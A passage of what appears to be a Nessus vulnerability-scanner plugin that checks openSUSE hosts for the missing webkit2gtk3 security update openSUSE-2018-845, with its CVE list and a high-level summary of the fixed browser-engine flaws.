extracted from openSUSE Security Update openSUSE-2018-845.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111626);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/08/10 11:41:20\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2018-845)\");\n script_summary(english:\"Check for the openSUSE-2018-845 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial 